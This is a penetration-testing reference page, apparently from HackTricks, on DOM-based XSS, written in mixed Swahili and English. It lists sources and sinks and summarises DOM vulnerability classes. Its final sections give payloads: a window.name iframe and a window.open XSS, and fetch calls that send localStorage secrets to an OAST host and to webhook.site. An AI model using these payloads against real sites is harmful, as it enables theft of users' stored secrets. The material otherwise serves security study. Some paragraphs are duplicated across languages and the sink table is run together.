DOM XSS

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Udhaifu za DOM

Udhaifu za DOM hutokea wakati data kutoka kwa attacker-controlled Sources (kama location.search, document.referrer, au document.cookie) inahamishwa bila usalama hadi kwa Sinks. Sinks ni functions au objects (mf., eval(), document.body.innerHTML) ambazo zinaweza kutekeleza au kuonyesha maudhui hatarishi ikiwa zitapewa data yenye nia mbaya.

  • Sources ni inputs zinazoweza kudhibitiwa na washambuliaji, zikiwemo URLs, cookies, na web messages.
  • Sinks ni endpoints zenye hatari ambapo data yenye nia mbaya inaweza kusababisha athari mbaya, kama script execution.

Hatari inatokea wakati data inapopita kutoka kwa source hadi sink bila uthibitisho au usafishaji unaofaa, ikimaanisha uwezekano wa mashambulizi kama XSS.

Tip

Unaweza kupata orodha iliyosasishwa zaidi ya sources na sinks katika https://github.com/wisec/domxsswiki/wiki

Common sources:

document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB(mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

Common Sinks:

Open RedirectJavascript InjectionDOM-data manipulationjQuery
locationeval()scriptElement.srcadd()
location.hostFunction() constructorscriptElement.textafter()
location.hostnamesetTimeout()scriptElement.textContentappend()
location.hrefsetInterval()scriptElement.innerTextanimate()
location.pathnamesetImmediate()someDOMElement.setAttribute()insertAfter()
location.searchexecCommand()someDOMElement.searchinsertBefore()
location.protocolexecScript()someDOMElement.textbefore()
location.assign()msSetImmediate()someDOMElement.textContenthtml()
location.replace()range.createContextualFragment()someDOMElement.innerTextprepend()
open()crypto.generateCRMFRequest()someDOMElement.outerTextreplaceAll()
domElem.srcdoc``Local file-path manipulationsomeDOMElement.valuereplaceWith()
XMLHttpRequest.open()FileReader.readAsArrayBuffer()someDOMElement.namewrap()
XMLHttpRequest.send()FileReader.readAsBinaryString()someDOMElement.targetwrapInner()
jQuery.ajax()FileReader.readAsDataURL()someDOMElement.methodwrapAll()
$.ajax()FileReader.readAsText()someDOMElement.typehas()
``Ajax request manipulationFileReader.readAsFile()someDOMElement.backgroundImageconstructor()
XMLHttpRequest.setRequestHeader()FileReader.root.getFile()someDOMElement.cssTextinit()
XMLHttpRequest.open()FileReader.root.getFile()someDOMElement.codebaseindex()
XMLHttpRequest.send()Link manipulationsomeDOMElement.innerHTMLjQuery.parseHTML()
jQuery.globalEval()someDOMElement.hrefsomeDOMElement.outerHTML$.parseHTML()
$.globalEval()someDOMElement.srcsomeDOMElement.insertAdjacentHTMLClient-side JSON injection
``HTML5-storage manipulationsomeDOMElement.actionsomeDOMElement.oneventJSON.parse()
sessionStorage.setItem()XPath injectiondocument.write()jQuery.parseJSON()
localStorage.setItem()document.evaluate()document.writeln()$.parseJSON()
**[**`Denial of Service`**](dom-xss.md#denial-of-service)**someDOMElement.evaluate()document.title``Cookie manipulation
requestFileSystem()``Document-domain manipulationdocument.implementation.createHTMLDocument()document.cookie
RegExp()document.domainhistory.pushState()WebSocket-URL poisoning
Client-Side SQl injectionWeb-message manipulationhistory.replaceState()WebSocket
executeSql()postMessage()````

The innerHTML sink doesn’t accept script elements on any modern browser, nor will svg onload events fire. This means you will need to use alternative elements like img or iframe.

Sink ya innerHTML haikubali elementi za script katika browser yoyote ya kisasa, na matukio ya svg onload hayatatokea. Hii inamaanisha utahitaji kutumia elementi mbadala kama img au iframe.

This kind of XSS is probably the hardest to find, as you need to look inside the JS code, see if it’s using any object whose value you control, and in that case, see if there is any way to abuse it to execute arbitrary JS.

Aina hii ya XSS pengine ni ngumu zaidi kugundua, kwa sababu unahitaji kuangalia ndani ya code ya JS, kuona ikiwa inatumia kitu chochote ambacho thamani yake unadhibiti, na ikiwa ni hivyo, kutafuta ikiwa kuna njia yoyote ya kuitumia vibaya ili kutekeleza JS yoyote.

Tools to find them

Examples

Open Redirect

From: https://portswigger.net/web-security/dom-based/open-redirection

Open redirect vulnerabilities in the DOM occur when a script writes data, which an attacker can control, into a sink capable of initiating navigation across domains.

Open redirect vulnerabilities in the DOM hutokea wakati script inaandika data, ambayo attacker anaweza kudhibiti, ndani ya sink inayoweza kuanzisha navigation kati ya domains.

It’s crucial to understand that executing arbitrary code, such as javascript:alert(1), is possible if you have control over the start of the URL where the redirection occurs.

Ni muhimu kuelewa kwamba kutekeleza code yoyote, kama javascript:alert(1), inawezekana ikiwa unadhibiti mwanzo wa URL ambapo redirection inatokea.

Sinks:

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
domElem.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()

From: https://portswigger.net/web-security/dom-based/cookie-manipulation

DOM-based cookie-manipulation vulnerabilities hutokea wakati script inayoingiza data ambayo inaweza kudhibitiwa na attacker, ndani ya thamani ya cookie. Udhaifu huu unaweza kusababisha tabia zisizotarajiwa za ukurasa wa wavuti ikiwa cookie itatumika ndani ya tovuti. Zaidi ya hayo, inaweza kutumika kutekeleza session fixation attack ikiwa cookie inahusika katika ufuatiliaji wa user sessions. Primary sink inayohusiana na udhaifu huu ni:

Sinks:

document.cookie

JavaScript Injection

Chanzo: https://portswigger.net/web-security/dom-based/javascript-injection

DOM-based JavaScript injection vulnerabilities hutokea wakati script inapoendesha data, ambayo inaweza kudhibitiwa na mshambuliaji, kama msimbo wa JavaScript.

Sinks:

eval()
Function() constructor
setTimeout()
setInterval()
setImmediate()
execCommand()
execScript()
msSetImmediate()
range.createContextualFragment()
crypto.generateCRMFRequest()

Document-domain manipulation

From: https://portswigger.net/web-security/dom-based/document-domain-manipulation

Document-domain manipulation vulnerabilities hufanyika wakati script inapoweka mali ya document.domain kwa kutumia data ambayo attacker anaweza kudhibiti.

Mali ya document.domain ina jukumu kuu katika utekelezaji wa same-origin policy na vivinjari. Wakati kurasa mbili kutoka origins tofauti zinaweka document.domain zao kwa thamani ileile, zinaweza kuingiliana bila vikwazo. Ingawa vivinjari vinaweka baadhi ya vikwazo juu ya thamani zinazoweza kuteuliwa kwa document.domain, kuzuia uteuzi wa thamani zisizo husiana kabisa na origin ya ukurasa, kuna isipokuwa. Kawaida, vivinjari huruhusu matumizi ya child au parent domains.

Sinks:

document.domain

WebSocket-URL poisoning

From: https://portswigger.net/web-security/dom-based/websocket-url-poisoning

WebSocket-URL poisoning hutokea wakati script inapotumia data inayoweza kudhibitiwa kama URL lengwa kwa muunganisho wa WebSocket.

Sinks:

The WebSocket constructor inaweza kusababisha udhaifu za WebSocket-URL poisoning.

From: https://portswigger.net/web-security/dom-based/link-manipulation

DOM-based link-manipulation vulnerabilities hutokea wakati script inaandika data inayoendeshwa na mshambuliaji kwa lengo la kuvinjari ndani ya ukurasa wa sasa, kama kiungo kinachoweza kubofya au submission URL ya kuwasilisha fomu.

Sinks:

someDOMElement.href
someDOMElement.src
someDOMElement.action

Ajax request manipulation

From: https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation

Ajax request manipulation vulnerabilities hutokea wakati script inaandika attacker-controllable data into an Ajax request ambayo imetumwa kwa kutumia XmlHttpRequest object.

Sinks:

XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.globalEval()
$.globalEval()

Local file-path manipulation

From: https://portswigger.net/web-security/dom-based/local-file-path-manipulation

Local file-path manipulation vulnerabilities hutokea wakati script inapita attacker-controllable data to a file-handling API kama parameter ya filename. Udhaifu huu unaweza kutumiwa na attacker kuunda URL ambayo, ikiwa itatembelewa na mtumiaji mwingine, inaweza kusababisha kivinjari cha mtumiaji kufungua au kuandika faili yoyote ya ndani.

Sinks:

FileReader.readAsArrayBuffer()
FileReader.readAsBinaryString()
FileReader.readAsDataURL()
FileReader.readAsText()
FileReader.readAsFile()
FileReader.root.getFile()
FileReader.root.getFile()

Client-Side SQl injection

From: https://portswigger.net/web-security/dom-based/client-side-sql-injection

Client-side SQL-injection vulnerabilities hutokea wakati script inapoingiza attacker-controllable data into a client-side SQL query in an unsafe way.

Sinks:

executeSql()

HTML5-storage manipulation

From: https://portswigger.net/web-security/dom-based/html5-storage-manipulation

HTML5-storage manipulation vulnerabilities hutokea wakati script stores attacker-controllable data in the web browser’s HTML5 storage (localStorage or sessionStorage). Ingawa hatua hii si kwa asili udhaifu wa usalama, inakuwa tatizo ikiwa application baadaye inasoma data iliyohifadhiwa na kuisindika kwa njia isiyo salama. Hii inaweza kumruhusu attacker kutumia mfumo wa uhifadhi kuendesha mashambulizi mengine ya DOM-based, kama cross-site scripting na JavaScript injection.

Sinks:

sessionStorage.setItem()
localStorage.setItem()

XPath injection

From: https://portswigger.net/web-security/dom-based/client-side-xpath-injection

DOM-based XPath-injection vulnerabilities hutokea wakati script inapoingiza attacker-controllable data into an XPath query.

Sinks:

document.evaluate()
someDOMElement.evaluate()

Client-side JSON injection

From: https://portswigger.net/web-security/dom-based/client-side-json-injection

DOM-based JSON-injection vulnerabilities hutokea wakati script inapoingiza attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application.

Sinks:

JSON.parse()
jQuery.parseJSON()
$.parseJSON()

Web-message manipulation

From: https://portswigger.net/web-security/dom-based/web-message-manipulation

Web-message vulnerabilities hutokea wakati script inapotuma attacker-controllable data as a web message to another document ndani ya browser. Mfano wa vulnerable Web-message manipulation unaweza kupatikana kwenye PortSwigger’s Web Security Academy.

Sinks:

The postMessage() method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.

DOM-data manipulation

From: https://portswigger.net/web-security/dom-based/dom-data-manipulation

DOM-data manipulation vulnerabilities hutokea wakati script inaandika attacker-controllable data to a field within the DOM ambacho kinatumiwa katika UI inayoonekana au client-side logic. Udhaifu huo unaweza kutumiwa na attacker kujenga URL ambayo, ikiwa itatembelewa na mtumiaji mwingine, inaweza kubadilisha muonekano au tabia ya UI ya client-side.

Sinks:

scriptElement.src
scriptElement.text
scriptElement.textContent
scriptElement.innerText
someDOMElement.setAttribute()
someDOMElement.search
someDOMElement.text
someDOMElement.textContent
someDOMElement.innerText
someDOMElement.outerText
someDOMElement.value
someDOMElement.name
someDOMElement.target
someDOMElement.method
someDOMElement.type
someDOMElement.backgroundImage
someDOMElement.cssText
someDOMElement.codebase
document.title
document.implementation.createHTMLDocument()
history.pushState()
history.replaceState()

Denial of Service

From: https://portswigger.net/web-security/dom-based/denial-of-service

DOM-based denial-of-service vulnerabilities hutokea wakati script inapopitisha kwa njia isiyo salama data inayodhibitiwa na mshambulizi kwa API ya jukwaa lenye matatizo. Hii inajumuisha APIs ambazo, zinapoitwa, zinaweza kusababisha kompyuta ya mtumiaji kutumia idadi kubwa ya CPU au nafasi kubwa ya diski. Udhaifu huo unaweza kuwa na athari kubwa za pembeni, kama vile kivinjari kukandamiza utendakazi wa tovuti kwa kukataa majaribio ya kuhifadhi data katika localStorage au kukata script zenye shughuli nyingi.

Sinks:

requestFileSystem()
RegExp()

Dom Clobbering

Dom Clobbering

Globali zisizoelezwa & matumizi mabaya ya window.name

Kurejelea name bila tamko (var/let/const) hutatua kuwa window.name. Kwa kuwa window.name hudumu baada ya navigations za cross-origin, mshambulizi anaweza kujaza mapema jina la muktadha wa browsing na HTML/JS na baadaye kufanya code ya mwathiriwa kuionyesha kama data ya kuaminika:

  • Fungua/elekeza lengo katika muktadha uliyo na jina unayodhibiti:
<iframe name="<img src=x onerror=fetch('https://oast/?f='+btoa(localStorage.flag))>" src="https://target/page"></iframe>
  • Au rudia kutumia window.open na jina la target lililotengenezwa:
window.open('https://target/page', "<svg/onload=alert(document.domain)>")

Ikiwa programu baadaye inafanya element.innerHTML = name (au sink sawa) bila kusafisha, kamba ya window.name inayodhibitiwa na mshambuliaji itaendeshwa katika target origin, ikiruhusu DOM XSS na upatikanaji wa same-origin storage.

Admin/automation flows: pre-seeded storage & javascript: navigation

Automation bots (e.g., Playwright) mara nyingi hutembelea ukurasa wa ndani kwanza, huweka secrets katika localStorage/cookies, kisha huvuka kwenda URLs zilizotolewa na mtumiaji. Kila primitive ya DOM XSS (pamoja na matumizi mabaya ya window.name) katika mtiririko huo inaweza exfiltrate the seeded secret:

fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getItem('flag')))

Iwapo bot haitazuia schemes, kutoa URL ya javascript: (javascript:fetch(...)) hutekelezwa katika origin ya sasa bila kuvinjari upya, ikileak moja kwa moja thamani za storage.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks